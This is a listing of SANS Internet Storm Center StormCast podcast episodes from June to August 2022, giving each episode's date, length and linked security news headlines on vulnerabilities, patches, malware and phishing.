8/25/2022, 5 minutes, 30 seconds

ISC StormCast for Wednesday, August 24th, 2022

Who's Looking at Your security.txt File? https://isc.sans.edu/diary/Who%27s+Looking+at+Your+security.txt+File%3F/28972
Assessing Python Malware Detectors with a Benchmark Dataset https://blog.chainguard.dev/taming-python-malware-scanners/
New Iranian APT Data Extraction Tool https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/
Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2022-33/
IBM MQ Update https://www.ibm.com/support/pages/node/6613021
8/24/2022, 6 minutes, 49 seconds

ISC StormCast for Tuesday, August 23rd, 2022

32 or 64 Bits Malware? https://isc.sans.edu/diary/32+or+64+bits+Malware%3F/28968
Proxies and Configurations Used for Credential Stuffing Attacks https://www.ic3.gov/Media/News/2022/220818.pdf
DirtyCred Linux Privilege Escalation Vulnerability https://www.blackhat.com/us-22/briefings/schedule/#cautious-a-new-exploitation-method-no-pipe-but-as-nasty-as-dirty-pipe-27169
Fake DDoS Pages on WordPress Sites Lead to Drive-By-Downloads https://blog.sucuri.net/2022/08/fake-ddos-pages-on-wordpress-lead-to-drive-by-downloads.html
8/23/2022, 7 minutes, 7 seconds

ISC StormCast for Monday, August 22nd, 2022

Brazil malspam pushes Astaroth (Guildma) malware https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962
Android Ring App XSS https://checkmarx.com/blog/amazon-quickly-fixed-a-vulnerability-in-ring-android-app-that-could-expose-users-camera-recordings/
iOS in-App Browser Security Issues https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser https://krausefx.com/blog/announcing-inappbrowsercom-see-what-javascript-commands-get-executed-in-an-in-app-browser
8/22/2022, 5 minutes, 41 seconds

ISC StormCast for Friday, August 19th, 2022

Honeypot Attack Summaries with Python https://isc.sans.edu/diary/Honeypot+Attack+Summaries+with+Python/28956
TP-Link Vulnerability https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/
Safari Update https://support.apple.com/en-us/HT213414
iOS VPN Leaks https://www.michaelhorowitz.com/VPNs.on.iOS.are.scam.php
Janet Jackson Hard Drive DDoS https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=106994
8/19/2022, 5 minutes, 48 seconds

ISC StormCast for Thursday, August 18th, 2022

A Quick VoIP Experiment https://isc.sans.edu/diary/A+Quick+VoIP+Experiment/28950
Apple Patches Two Exploited Vulnerabilities https://isc.sans.edu/diary/Apple+Patches+Two+Exploited+Vulnerabilities/28952
Google Chrome Update https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html
Cisco staystaystay exploit tool https://www.youtube.com/watch?v=ySgbHClk9HE
8/18/2022, 5 minutes, 52 seconds

ISC StormCast for Wednesday, August 17th, 2022

VBA Maldoc and UTF7 (APT-C-35) https://isc.sans.edu/diary/VBA+Maldoc+%26+UTF7+%28APT-C-35%29/28946
Disrupting SEABORGIUM's Ongoing Phishing Operations https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/
UWB Real Time Location Systems: How Secure Radio Communications May Fail in Practice.
8/17/2022, 6 minutes, 24 seconds

ISC StormCast for Tuesday, August 16th, 2022

Realtek CVE-2022-27255 Followup (snort signature and presentation) https://isc.sans.edu/diary/Realtek+SDK+SIP+ALG+Vulnerability%3A+A+Big+Deal%2C+but+not+much+you+can+do+about+it.+CVE+2022-27255/28940
macOS Privilege Escalation https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/
Zoom Update https://explore.zoom.us/en/trust/security/security-bulletin/
Microsoft Blocks Vulnerable Bootloaders https://eclypsium.com/2022/08/11/vulnerable-bootloaders-2022/
HPE Integrated Lights Out 5 Vulnerabilities https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbhf04333en_us
8/16/2022, 6 minutes, 31 seconds

ISC StormCast for Monday, August 15th, 2022

Realtek eCOS SDK SIP ALG Vulnerability https://isc.sans.edu/diary/Realtek+SDK+SIP+ALG+Vulnerability%3A+A+Big+Deal%2C+but+not+much+you+can+do+about+it.+CVE+2022-27255/28940
Phishing HTML Attachment as Voicemail Audio Transcription https://isc.sans.edu/diary/Phishing+HTML+Attachment+as+Voicemail+Audio+Transcription/28938
CVE-2022-0028 PAN-OS: Reflected Amplification Denial-of-Service Vulnerability https://security.paloaltonetworks.com/CVE-2022-0028
8/15/2022, 11 minutes, 37 seconds

ISC StormCast for Friday, August 12th, 2022

InfoStealer Script Based on Curl and NSudo https://isc.sans.edu/diary/InfoStealer+Script+Based+on+Curl+and+NSudo/28932
Cisco Breach Details https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html
Ivanti Pulse Connect Secure Privilege Escalation Vulnerability https://gist.github.com/JGarciaSec/2060ec1c8efc1d573a1ddb754c6b4f84
Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software RSA Private Key Leak Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-rsa-key-leak-Ms7UEfZz
8/12/2022, 6 minutes, 53 seconds

ISC StormCast for Thursday, August 11th, 2022

And Here They Come Again: DNS Reflection Attacks https://isc.sans.edu/diary/And+Here+They+Come+Again%3A+DNS+Reflection+Attacks/28928
Rapid7 Defaultinator https://defaultinator.com
Zimbra Mass Compromise https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/
VMware vRealize Vulnerability https://www.vmware.com/security/advisories/VMSA-2022-0022.html
Microsoft Vulnerability and IPS/Snort https://community.meraki.com/t5/Meraki-Service-Notices/Microsoft-vulnerability-and-IPS-SNORT/ba-p/156649
8/11/2022, 6 minutes, 22 seconds

ISC StormCast for Wednesday, August 10th, 2022

Microsoft August 2022 Patch Tuesday https://isc.sans.edu/diary/Microsoft+August+2022+Patch+Tuesday/28924
AEPIC Leak https://aepicleak.com
Adobe security bulletins https://helpx.adobe.com/security/security-bulletin.html
8/10/2022, 5 minutes, 39 seconds

ISC StormCast for Tuesday, August 9th, 2022

JSON All the Logs! https://isc.sans.edu/diary/JSON+All+the+Logs%21/28920
Microsoft Edge Enhanced Security https://docs.microsoft.com/en-us/deployedge/microsoft-edge-security-browse-safer
Malicious Python Packages https://www.darkreading.com/application-security/10-malicious-packages-slither-pypi-registry
New Orchard Botnet https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/
8/9/2022, 6 minutes, 26 seconds

ISC StormCast for Monday, August 8th, 2022

Exim Vulnerability Silently Patched https://github.com/ivd38/exim_overflow
DuckDuckGo Stopping Microsoft Tracking Code https://spreadprivacy.com/more-privacy-and-transparency/
Emergency Broadcast Messaging System Vulnerabilities https://content.govdelivery.com/accounts/USDHSFEMA/bulletins/3263326
Slack Leaks Hashed Passwords https://slack.com/intl/en-in/blog/news/notice-about-slack-password-resets
Zimbra Flaw Exploited https://nvd.nist.gov/vuln/detail/CVE-2022-27924
8/8/2022, 6 minutes, 22 seconds

ISC StormCast for Friday, August 5th, 2022

TLP 2.0 is Here https://isc.sans.edu/diary/TLP+2.0+is+here/28914
Hijacking email with Cloudflare Email Routing https://albertpedersen.com/blog/hijacking-email-with-cloudflare-email-routing/
rsync arbitrary file write vulnerability https://www.openwall.com/lists/oss-security/2022/08/02/1
Local privilege escalation in Kaspersky VPN https://www.synopsys.com/blogs/software-security/cyrc-advisory-kasperksy-vpn-microsoft-windows/
8/5/2022, 7 minutes, 10 seconds

ISC StormCast for Thursday, August 4th, 2022

l9explore and LeakIX Internet Wide Recon Scans https://isc.sans.edu/diary/l9explore+and+LeakIX+Internet+wide+recon+scans./28910
Arris / Arris Variant DSL/Fiber Router Critical Vulnerability http://derekabdine.com/blog/2022-arris-advisory
35,000 Malicious Repo Forks Flood GitHub https://www.bleepingcomputer.com/news/security/35-000-code-repos-not-hacked-but-clones-flood-github-to-serve-malware/
Palo Alto Master Key https://twitter.com/rqu50/status/1554566757704089600#m
Laravel Unserialize RCE https://github.com/beicheng-maker/vulns/issues/1
Unauthenticated Remote Code Execution in DrayTek Vigor Routers https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html
8/4/2022, 6 minutes, 39 seconds

ISC StormCast for Wednesday, August 3rd, 2022

Increase in Chinese "Hacktivism" Attacks https://isc.sans.edu/diary/Increase+in+Chinese+%22Hacktivism%22+Attacks/28906
Zoho Password Manager Exploit https://xz.aliyun.com/t/11578
VMware Updates https://www.vmware.com/security/advisories/VMSA-2022-0021.html https://twitter.com/VietPetrus
Manjusaka: A Chinese sibling of Sliver and Cobalt Strike https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html
8/3/2022, 5 minutes, 31 seconds

ISC StormCast for Tuesday, August 2nd, 2022

A Little DDoS in the Morning https://isc.sans.edu/diary/A+Little+DDoS+In+the+Morning/28900
Exposed Twitter API Keys https://cloudsek.com/whitepapers_reports/how-leaked-twitter-api-keys-can-be-used-to-build-a-bot-army/
TCL LinkHub Serialization Issues https://blog.talosintelligence.com/2022/08/vulnerability-spotlight-how-misusing.html
Jenkins Plugin Updates https://www.jenkins.io/security/advisory/2022-07-27/
8/2/2022, 6 minutes, 40 seconds

ISC StormCast for Monday, August 1st, 2022

PDF Analysis Introduction and OpenActions Entries https://isc.sans.edu/diary/PDF+Analysis+Intro+and+OpenActions+Entries/28894
IPFS The New Hotbed of Phishing https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/
Mail Stealing Browser Extension https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/
Lofylife Malicious NPM Packages https://securelist.com/lofylife-malicious-npm-packages/107014/
IP Camera Vulnerability https://www.nozominetworks.com/blog/vulnerability-in-dahua-s-onvif-implementation-threatens-ip-camera-security/
Nuki Smart Lock Vulnerabilities https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/
Foxit PDF Reader https://www.foxit.com/support/security-bulletins.html
8/1/2022, 8 minutes, 34 seconds

ISC StormCast for Friday, July 29th, 2022

Exfiltrating Data with Bookmarks https://isc.sans.edu/diary/Exfiltrating+Data+With+Bookmarks/28890
Critical Samba Bug Could Let Anyone Become Domain Admin https://nakedsecurity.sophos.com/2022/07/27/critical-samba-bug-could-let-anyone-become-domain-admin-patch-now/
Apple IP Address Range Hijacked by Rostelecom https://www.manrs.org/2022/07/for-12-hours-was-part-of-apple-engineerings-network-hijacked-by-russias-rostelecom/
Veritas Patches https://www.veritas.com/content/support/en_US/security/VTS22-004#c1
IBM Patches https://www.ibm.com/support/pages/node/6606251 https://www.ibm.com/support/pages/node/6607135
7/29/2022, 7 minutes, 9 seconds

ISC StormCast for Thursday, July 28th, 2022

IcedID (BokBot) with Dark VNC and Cobalt Strike https://isc.sans.edu/diary//28884
Web Assembly Crypto Miners https://blog.sucuri.net/2022/07/cryptominers-webassembly-in-website-malware.html
Subzero and Knotweed https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
7/28/2022, 6 minutes, 3 seconds

ISC StormCast for Wednesday, July 27th, 2022

How is Your macOS Security Posture? https://isc.sans.edu/diary/How+is+Your+macOS+Security+Posture%3F/28882
Registry file with Executable Payload https://www.x86matthew.com/view_post?id=embed_exe_reg
Targeted Phishing of Facebook Business Users https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf
Forwarding Addresses is Hard https://www.synacktiv.com/publications/cve-2022-31813-forwarding-addresses-is-hard.html
7/27/2022, 6 minutes, 9 seconds

ISC StormCast for Tuesday, July 26th, 2022

PowerShell Script with Fileless Capability https://isc.sans.edu/diary/PowerShell+Script+with+Fileless+Capability/28878
With Management Comes Risk: Finding Flaws in Filewave MDM https://claroty.com/2022/07/25/blog-research-with-management-comes-risk-finding-flaws-in-filewave-mdm/
CosmicStrand: the discovery of a sophisticated UEFI firmware rootkit https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/
7/26/2022, 7 minutes, 3 seconds

ISC StormCast for Monday, July 25th, 2022

An Analysis of a Discerning Phishing Website https://isc.sans.edu/diary/An+Analysis+of+a+Discerning+Phishing+Website+/28870
Sonicwall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0007
Sh*load Exploits Episode V: Return of the Error https://dellfer.com/shload-exploits-episode-v-return-of-the-error/
7/25/2022, 5 minutes, 48 seconds

ISC StormCast for Friday, July 22nd, 2022

Maldoc with non-ASCII VBA Identifiers https://isc.sans.edu/diary/Maldoc%3A+non-ASCII+VBA+Identifiers/28866
Cisco Security Updates https://tools.cisco.com/security/center/publicationListing.x?
Outlook 365 Odd Suspicious Login Attempt Warnings https://www.theregister.com/2022/07/21/outlook_sign_ins/
Windows RDP Brute Force Protection https://twitter.com/dwizzzleMSFT/status/1549870156771340288
Microsoft resuming blocking macros https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
7/22/2022, 6 minutes, 24 seconds

ISC StormCast for Thursday, July 21st, 2022

Malicious Python Script Behaving Like a Rubber Ducky https://isc.sans.edu/diary/Malicious+Python+Script+Behaving+Like+a+Rubber+Ducky/28860
Apple Patches Everything https://isc.sans.edu/diary/Apple+Patches+Everything+Day/28862
Confluence Atlassian Hard Coded Password https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
Zyxel Vulnerability https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml
DNS over HTTP/3 https://security.googleblog.com/2022/07/dns-over-http3-in-android.html
7/21/2022, 6 minutes, 9 seconds

ISC StormCast for Wednesday, July 20th, 2022

Beacon Request https://isc.sans.edu/diary/Requests+For+beacon.http-get.+Help+Us+Figure+Out+What+They+Are+Looking+For/28856
Oracle July 2022 CPU https://www.oracle.com/security-alerts/cpujul2022.html
CloudMensis MacOS Spyware https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/
GPS Tracker Vulnerabilities https://www.bitsight.com/sites/default/files/2022-07/MiCODUS-GPS-Report-Final.pdf
7/20/2022, 7 minutes, 11 seconds

ISC StormCast for Tuesday, July 19th, 2022

Adding Your Own Keywords to My PDF Tools https://isc.sans.edu/diary/Adding+Your+Own+Keywords+To+My+PDF+Tools/28852
Tor Improvements https://blog.torproject.org/new-release-tor-browser-115/
Trojan Horse Malware Password Cracker https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/
CVE-2022-33891 Apache Spark Shell Command Injection Vulnerability https://securityonline.info/cve-2022-33891-apache-spark-shell-command-injection-vulnerability/
Juniper Junos Vulnerabilities https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=[Security%20Advisories]
7/19/2022, 6 minutes, 1 second

ISC StormCast for Monday, July 18th, 2022

Python: Files in Use By Another Process https://isc.sans.edu/diary/Python%3A+Files+In+Use+By+Another+Process/28848
Google Removing App Permissions List for Data Safety https://twitter.com/MishaalRahman/status/1547307555407421443
Google Play Malware https://twitter.com/IngraoMaxime/status/1547164768401858560
Faking Github Metadata https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/
7/18/2022, 5 minutes, 19 seconds

ISC StormCast for Friday, July 15th, 2022

Debugging Broadcast Storms https://isc.sans.edu/diary/A+%22DHCP+is+Broken%22+story%2C+and+a+Blast+from+the+Past+%28or+should+I+say+%22Storm%22+from+the+past%29/28844
Targeted Deanonymization via Side Channel Attacks https://leakuidatorplusteam.github.io/preprint.pdf
Cookie Theft to BEC https://www.microsoft.com/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/
VMWare Patch https://www.vmware.com/security/advisories/VMSA-2021-0025.html
7/15/2022, 6 minutes, 40 seconds

ISC StormCast for Thursday, July 14th, 2022

Using Referrers to Detect Phishing Attacks https://isc.sans.edu/diary/Using+Referers+to+Detect+Phishing+Attacks/28836
Callback Phishing Campaigns Impersonating Security Companies https://www.crowdstrike.com/blog/callback-malware-campaigns-impersonate-crowdstrike-and-other-cybersecurity-companies/
Retbleed Spectre Attack https://comsec.ethz.ch/wp-content/files/retbleed_sec22.pdf
Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706 https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/
Buffer Overflow Vulnerabilities in UEFI firmware of several Lenovo Notebooks https://twitter.com/ESETresearch/status/1547166334651334657
7/14/2022, 5 minutes, 48 seconds

ISC StormCast for Wednesday, July 13th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft+July+2022+Patch+Tuesday/28838
Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
SAP Patches https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10
IBM Patches https://www.ibm.com/support/pages/node/6602255 https://www.ibm.com/support/pages/node/6602259 https://www.ibm.com/support/pages/node/6602251
7/13/2022, 5 minutes, 48 seconds

ISC StormCast for Tuesday, July 12th, 2022

Rogers Outage https://about.rogers.com/news-ideas/a-message-from-rogers-president-and-ceo/
Rolling Pwn https://rollingpwn.github.io/rolling-pwn/
GitHub Runners mine Cryptocoins https://www.trendmicro.com/en_us/research/22/g/unpacking-cloud-based-cryptocurrency-miners-that-abuse-github-ac.html
SANSFIRE Keynote Stream https://www.sans.org/webcasts/the-internet-storm-center-how-to-use-and-how-to-contribute-data/
7/12/2022, 6 minutes, 16 seconds

ISC StormCast for Monday, July 11th, 2022

SANSFIRE Keynote Stream https://www.sans.org/webcasts/the-internet-storm-center-how-to-use-and-how-to-contribute-data/
Extracting URLs from Emotet with Cyberchef https://isc.sans.edu/forums/diary/Excel%204%20Emotet%20Maldoc%20Analysis%20using%20CyberChef/28830/
Microsoft Rolling Back Macro Policy Change https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
Checkmate Ransomware Affected Poorly Configured QNAP NAS https://www.qnap.com/en/security-advisory/QSA-22-21
PyPi Requires 2FA for critical packages https://pypi.org/security-key-giveaway/
7/11/2022, 5 minutes, 27 seconds

ISC StormCast for Thursday, July 7th, 2022

How Many SANs are Insane https://isc.sans.edu/forums/diary/How+Many+SANs+are+Insane/28820/
Fortinet July Updates https://fortiguard.fortinet.com/psirt?date=07-2022
Phishing Attacks Getting Trickier https://www.sans.org/newsletters/ouch/phishing-attacks-getting-trickier
Quantum Safe Ciphers https://csrc.nist.gov/News/2022/pqc-candidates-to-be-standardized-and-round-4
Apple Proposes Lockdown Mode https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/
7/7/2022, 7 minutes, 21 seconds

ISC StormCast for Wednesday, July 6th, 2022

EternalBlue 5 Years After WannaCry and NotPetya https://isc.sans.edu/forums/diary/EternalBlue+5+years+after+WannaCry+and+NotPetya/28816/
OpenSSL Patches Two Vulnerabilities https://www.openssl.org/news/secadv/20220705.txt
Iconburst NPM Software Supply Chain Attack https://blog.reversinglabs.com/blog/iconburst-npm-software-supply-chain-attack-grabs-data-from-apps-websites
7/6/2022, 6 minutes, 20 seconds

ISC StormCast for Tuesday, July 5th, 2022

7Zip Mark of the Web For Office Files https://isc.sans.edu/forums/diary/7Zip+MoW+For+Office+files/28812/
SessionManager Backdoor Seen with IIS https://securelist.com/the-sessionmanager-iis-backdoor/106868/
Google Chrome Stable Channel Update https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
7/5/2022, 5 minutes, 31 seconds

ISC StormCast for Friday, July 1st, 2022

Case Study: Cobalt Strike Server Lives on After its Domain is Suspended https://isc.sans.edu/forums/diary/Case+Study+Cobalt+Strike+Server+Lives+on+After+Its+Domain+Is+Suspended/28804/
CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus https://www.horizon3.ai/red-team-blog-cve-2022-28219/
CWE Top 25 Update https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html#analysis
7/1/2022, 6 minutes, 28 seconds

ISC StormCast for Thursday, June 30th, 2022

Its New Phone Day: Time to Migrate Your MFA https://isc.sans.edu/forums/diary/Its+New+Phone+Day+Time+to+migrate+your+MFA/28800/
Managing Human Risk Security Awareness Report https://go.sans.org/lp-wp-2022-sans-security-awareness-report
Microsoft Azure Service Fabric Container Elevation of Privilege Vulnerability https://unit42.paloaltonetworks.com/fabricscape-cve-2022-30137/#The-Vulnerability https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30137
Zimbra RCE Vulnerability https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/
FBI Warns of Deep Fakes Being Used in Job Interviews https://www.ic3.gov/Media/Y2022/PSA220628
6/30/2022, 6 minutes, 45 seconds

ISC StormCast for Wednesday, June 29th, 2022

Possible Scans for HiByMusic Devices https://isc.sans.edu/forums/diary/Possible+Scans+for+HiByMusic+Devices/28796/
OpenSSL Heap Overflow https://guidovranken.com/2022/06/27/notes-on-openssl-remote-memory-corruption/ https://github.com/openssl/openssl/issues/18625#issuecomment-1165012549
ZuoRat Malware Hijacking Home Office Routers https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/
6/29/2022, 5 minutes, 48 seconds

ISC StormCast for Tuesday, June 28th, 2022

Encrypted Client Hello: Anybody Using it Yet? https://isc.sans.edu/forums/diary/Encrypted+Client+Hello+Anybody+Using+it+Yet/28792/
Jenkins Advisory https://www.jenkins.io/security/advisory/2022-06-22/
Instagram Age Verification https://about.fb.com/news/2022/06/new-ways-to-verify-age-on-instagram/
CodeSys V2 Vulnerability https://github.com/ic3sw0rd/Codesys_V2_Vulnerability
6/28/2022, 6 minutes, 30 seconds

ISC StormCast for Monday, June 27th, 2022

Python Abusing the Windows GUI https://isc.sans.edu/forums/diary/Python+abusing+The+Windows+GUI/28780/
Malicious Code Passed to PowerShell via the Clipboard https://isc.sans.edu/forums/diary/Malicious+Code+Passed+to+PowerShell+via+the+Clipboard/28784/
Attacking With WebView2 Applications https://mrd0x.com/attacking-with-webview2-applications/
Bronze Starlight Ransomware Operations Use Hui Loaders https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader
Novel Exploit Detected in Mitel VoIP Appliance https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499
6/27/2022, 7 minutes, 51 seconds

ISC StormCast for Thursday, June 23rd, 2022

Malicious PowerShell Targeting Cryptocurrency Browser Extensions https://isc.sans.edu/forums/diary/Malicious+PowerShell+Targeting+Cryptocurrency+Browser+Extensions/28772/
Keeping PowerShell: Security Measures to Use and Embrace https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/1/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF
Client-Side Magecart Attacks Still Around, But More Covert https://blog.malwarebytes.com/threat-intelligence/2022/06/client-side-magecart-attacks-still-around-but-more-covert/
Chinese actor takes aim, armed with Nim Language and Bizarro AES https://research.checkpoint.com/2022/chinese-actor-takes-aim-armed-with-nim-language-and-bizarro-aes/
Israeli Air Raid Sirens Hacked https://twitter.com/Israel_Cyber/status/1538821467785265153
6/23/2022, 5 minutes, 31 seconds

ISC StormCast for Wednesday, June 22nd, 2022

Experimental New Domain / Domain Age API https://isc.sans.edu/forums/diary/Experimental+New+Domain+Domain+Age+API/28770/
Forescout Vedere Labs Discovers 56 OT Vulnerabilities https://www.forescout.com/resources/ot-icefall-report/
Cloudflare Outage https://blog.cloudflare.com/cloudflare-outage-on-june-21-2022/
Does Acrobat Reader Unload Injection of Security Products https://blog.minerva-labs.com/does-acrobat-reader-unload-injection-of-security-products
7-Zip Mark-of-the-Web Support https://www.7-zip.org/history.txt
6/22/2022, 6 minutes, 16 seconds

ISC StormCast for Tuesday, June 21st, 2022

Odd TCP Fast Open Packets https://isc.sans.edu/forums/diary/Odd+TCP+Fast+Open+Packets+Anybody+understands+why/28766/
DFSCoerce NTLM Relay Attack https://github.com/Wh04m1001/DFSCoerce https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
Windows Emergency Update Fixes Microsoft 365 Issues on ARM Devices https://www.bleepingcomputer.com/news/microsoft/windows-emergency-update-fixes-microsoft-365-issues-on-arm-devices/
Safari Vulnerability Analysis https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html
Internet Explorer Remnants Still an Issue https://www.darkreading.com/vulnerabilities-threats/internet-explorer-will-likely-remain-an-attacker-target-for-some-time
6/21/2022, 5 minutes, 43 seconds

ISC StormCast for Monday, June 20th, 2022

Critical Vulnerability in Splunk Enterprise Deployment Server Functionality https://isc.sans.edu/forums/diary/Critical+vulnerability+in+Splunk+Enterprises+deployment+server+functionality/28760/
Malspam Pushes Matanbuchus Malware Leads to Cobalt Strike https://isc.sans.edu/forums/diary/Malspam+pushes+Matanbuchus+malware+leads+to+Cobalt+Strike/28752/
Proofpoint Discovers Potentially Dangerous Office 365 Functionality https://www.proofpoint.com/us/blog/cloud-security/proofpoint-discovers-potentially-dangerous-microsoft-office-365-functionality
6/20/2022, 8 minutes, 34 seconds

ISC StormCast for Friday, June 17th, 2022

Houdini is Back Delivered Through a JavaScript Dropper https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/
Drifting Cloud: Zero-Day Sophos Firewall Exploitation https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack
Cisco Email Security Appliance and Cisco Secure Email and Web Manager https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-esa-auth-bypass-66kEcxQD
Analyzing the Fastjson "Auto Type Bypass" RCE vulnerability https://jfrog.com/blog/cve-2022-25845-analyzing-the-fastjson-auto-type-bypass-rce-vulnerability/
6/17/2022, 5 minutes, 56 seconds

ISC StormCast for Thursday, June 16th, 2022

Terraforming Honeypots: Using IaaC & Cloud to Attract Attacks https://isc.sans.edu/forums/diary/Terraforming+Honeypots+Installing+DShield+Sensors+in+the+Cloud/28748/
Zimbra Email - Stealing Clear-Text Credentials via Memcache Injection https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/
Cloud Middleware Dataset https://github.com/wiz-sec/cloud-middleware-dataset
CVE-2022-26937 Windows Network File System NLM Portmap Stack Buffer Overflow https://www.zerodayinitiative.com/blog/2022/6/7/cve-2022-26937-microsoft-windows-network-file-system-nlm-portmap-stack-buffer-overflow
Citrix Application Delivery Management Security Bulletin https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512
Hardcoded Backdoor User and Outdated Software Components in Nexans FTTO GigaSwitch https://sec-consult.com/vulnerability-lab/advisory/hardcoded-backdoor-user-outdated-software-components-nexans-ftto-gigaswitch/
6/16/2022, 5 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, June 15th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2022+Patch+Tuesday/28742/
Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
SynLapse Vulnerability https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/
Hertzbleed Attack https://www.hertzbleed.com
6/15/2022 7 minutes, 5 seconds

ISC StormCast for Tuesday, June 14th, 2022

Translating Saitama's DNS Tunneling https://isc.sans.edu/forums/diary/Translating+Saitamas+DNS+tunneling+messages/28738/
Travis CI Logs Expose Users to Cyber Attacks https://blog.aquasec.com/travis-ci-security
Linux Threat Hunting: "Syslogk" a kernel rootkit found under development in the wild https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/
Mitel Desk Phone Backdoor https://blog.syss.com/posts/rooting-mitel-desk-phones-through-the-backdoor/
6/14/2022 5 minutes, 48 seconds

ISC StormCast for Monday, June 13th, 2022

EPSScall: An Exploit Prediction Scoring System App https://isc.sans.edu/forums/diary/EPSScall+An+Exploit+Prediction+Scoring+System+App/28732/
PACMan Attack https://pacmanattack.com https://twitter.com/wdormann/status/1535245913857351680
Carrier LenelS2 HID Mercury access panel vulnerability https://www.cisa.gov/uscert/ics/advisories/icsa-22-153-01
Malicious Python Modules https://www.bleepingcomputer.com/news/security/pypi-package-keep-mistakenly-included-a-password-stealer/
6/13/2022 6 minutes, 21 seconds

ISC StormCast for Friday, June 10th, 2022

TA570 QBot attempts to exploit CVE-2022-30190 (Follina) https://isc.sans.edu/forums/diary/TA570+Qakbot+Qbot+tries+CVE202230190+Follina+exploit+msmsdt/28728/
Analysis of a Facebook Phishing Campaign https://pixmsecurity.com/blog/blog/phishing-tactics-how-a-threat-actor-stole-1m-credentials-in-4-months/
